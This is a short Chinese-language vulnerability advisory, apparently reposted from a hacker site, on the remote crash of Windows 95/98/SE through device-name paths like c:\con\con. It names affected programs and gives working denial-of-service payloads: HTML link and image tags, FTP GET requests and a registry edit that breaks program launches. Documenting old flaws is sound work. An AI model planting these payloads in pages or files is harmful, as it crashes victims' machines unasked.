Windows 95/98/SE 远程DoS攻击
/ns/wz/net/data/20010414002618.htm
Windows 95/98/SE 远程DoS攻击
受影响的系统:Windows 95/98/SE
不受影响的版本: 未知
远程: YES / 本地:YES
内容摘要:
当系统受到这个一个特殊的路径时将重起或崩溃。
受影响的还有
WarFTPd (Windows 95/98/SE)
Microsoft Outlook (Windows 95/98/SE)
Eudora Pro 4.2 (Windows 95/98/SE)
漏洞的利用:
1.
<HTML>
<BODY>
<A HREF="c:\con\con">crashing IE</A>
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
2.
GET /con/con 或 GET /nul/nul 在WarFTPd的root目录下
3.
修改注册表[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open]
c:\con\con "%1" %* 或 c:\nul\nul "%1" %*
4.
<HTML>
<BODY>
<IMG SRC="c:\con\con">
<!-- or nul\nul, clock$\clock$ -->
<!-- or aux\aux, config$\config$ -->
</BODY>
</HTML>
解决方案:
升级到Windows NT或Windows 2000
Last Modify Time [2000-03-09]
转自:黑客天堂